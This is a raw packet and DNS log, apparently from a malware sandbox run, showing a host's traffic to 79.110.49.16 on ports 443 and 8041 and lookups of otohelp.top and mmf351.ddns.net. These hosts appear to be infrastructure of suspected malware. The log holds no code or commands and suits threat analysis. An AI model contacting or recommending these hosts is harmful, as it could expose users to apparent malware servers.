Oct 2, 2024 06:23:06.093859911 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094193935 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094232082 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094244957 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094295979 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.094295979 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.094360113 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094424009 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.094691038 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094707012 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.094861031 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.094881058 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.095405102 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.095426083 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.095467091 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.095474958 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.095498085 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.095927000 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.095948935 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096079111 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.096088886 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096460104 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096479893 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096597910 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.096606970 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096946955 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.096961021 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.097094059 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.097103119 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.097522974 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.097543001 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.097580910 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.097589016 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.097616911 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.147202969 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.180042982 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.180056095 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.180099964 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.180144072 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.180181026 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.180207968 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.180670023 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.180735111 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.180752039 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.181358099 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.181391001 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.181397915 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.181416035 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.181431055 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.182394028 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.182408094 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.182423115 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.182934046 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.182945013 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183024883 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183042049 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183109999 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.183109999 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.183120966 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183650970 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183665991 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183760881 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183779955 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183790922 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.183804989 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.183818102 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.183866978 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.183866978 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.184706926 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.184734106 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.184791088 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.184791088 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.184801102 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.184900999 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.266295910 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.266316891 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.266812086 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.266861916 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.266887903 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.266963005 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.267000914 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.267000914 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.267468929 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.267483950 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268021107 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268044949 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268064976 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.268085957 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268132925 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.268162966 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.268162966 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.268356085 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268369913 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.268676043 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.268692017 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269085884 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269105911 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269202948 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.269202948 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.269220114 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269355059 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.269541979 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269571066 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269629955 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.269642115 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.269642115 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.270016909 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.270016909 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.300683022 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.300762892 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.305003881 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.305003881 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.305073977 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.929239988 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.941267014 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.941287994 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191550970 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191571951 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191581011 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191591978 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191629887 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191658974 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.191689014 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.191705942 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.191745996 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.278512955 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.278537035 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.278649092 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.278685093 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.278724909 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.280324936 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.280340910 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.280394077 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.280410051 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.280448914 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.365377903 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.365397930 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.365478039 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.365505934 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.365554094 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.366729975 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.366745949 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.366812944 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.366825104 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.366863012 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.368052959 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.368067980 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.368141890 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.368159056 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.368201971 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.369606018 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.369626045 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.369672060 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.369689941 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.369714975 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.369730949 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.453046083 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453063965 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453135967 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.453162909 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453196049 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.453210115 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.453780890 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453797102 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453855038 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.453869104 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.453942060 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.454695940 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.454710960 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.454791069 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.454791069 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.454807043 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.454855919 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.455022097 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.455039024 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.455085993 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.455092907 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.455209970 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.455954075 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.455969095 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.456022978 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.456037045 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.456119061 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.456897974 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.456913948 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.456960917 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.456970930 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.456995010 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.457010984 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.457765102 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.457779884 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.457828045 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.457843065 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.457859039 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.457895994 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.540163040 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.540179968 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.540249109 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.540273905 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.540297985 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.540316105 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.540704966 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.540720940 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.540786028 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.540791035 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541196108 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541217089 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541261911 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.541268110 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541296959 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.541317940 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.541712999 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541727066 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.541786909 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.541791916 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.543364048 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.545006990 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545027971 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545490980 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.545506001 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545572042 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545589924 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545646906 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.545655012 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545691967 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.545954943 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.545969963 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.546025038 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.546032906 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.546165943 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.546487093 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.546502113 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.546554089 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.546561956 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.547965050 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.604713917 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.604746103 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.604815006 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.604844093 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.604861021 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.608274937 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.629762888 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.629784107 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.629858971 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.629884958 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.629931927 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.630280018 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630295992 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630347013 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.630356073 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630789042 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630809069 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630848885 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.630857944 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.630881071 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.630911112 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.631315947 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631330967 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631395102 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.631401062 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631876945 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631895065 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631926060 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.631937981 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.631963968 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.631987095 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.632347107 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.632359982 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.632406950 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.632415056 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.632683992 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.633028030 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.633043051 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.633089066 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.633096933 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.633147001 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.692365885 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.692388058 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.692511082 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.692538977 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.692692041 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.717525005 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.717542887 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.717668056 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.717684984 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718059063 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718089104 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718122005 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.718132019 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718148947 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.718175888 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.718342066 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718399048 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.718404055 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718419075 CEST	443	49763	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:07.718460083 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:07.718961954 CEST	49763	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:11.807212114 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:11.812038898 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:11.812112093 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:12.236090899 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:12.241049051 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:12.447809935 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:12.474549055 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:12.479649067 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:12.660109043 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:12.708115101 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:14.256572962 CEST	56641	8041	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:14.263448954 CEST	8041	56641	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:14.263520956 CEST	56641	8041	192.168.2.4	79.110.49.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:22:47.833029985 CEST	58237	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:22:48.264246941 CEST	53	58237	1.1.1.1	192.168.2.4
Oct 2, 2024 06:23:11.022011042 CEST	64818	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:23:11.028829098 CEST	53	64818	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:22:47.833029985 CEST	192.168.2.4	1.1.1.1	0xad43	Standard query (0)	otohelp.top	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:23:11.022011042 CEST	192.168.2.4	1.1.1.1	0xaf7c	Standard query (0)	mmf351.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:22:48.264246941 CEST	1.1.1.1	192.168.2.4	0xad43	No error (0)	otohelp.top		79.110.49.16	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:22:50.849019051 CEST	1.1.1.1	192.168.2.4	0xdc66	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:22:50.849019051 CEST	1.1.1.1	192.168.2.4	0xdc66	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:22:51.613059044 CEST	1.1.1.1	192.168.2.4	0x34d7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:22:51.613059044 CEST	1.1.1.1	192.168.2.4	0x34d7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
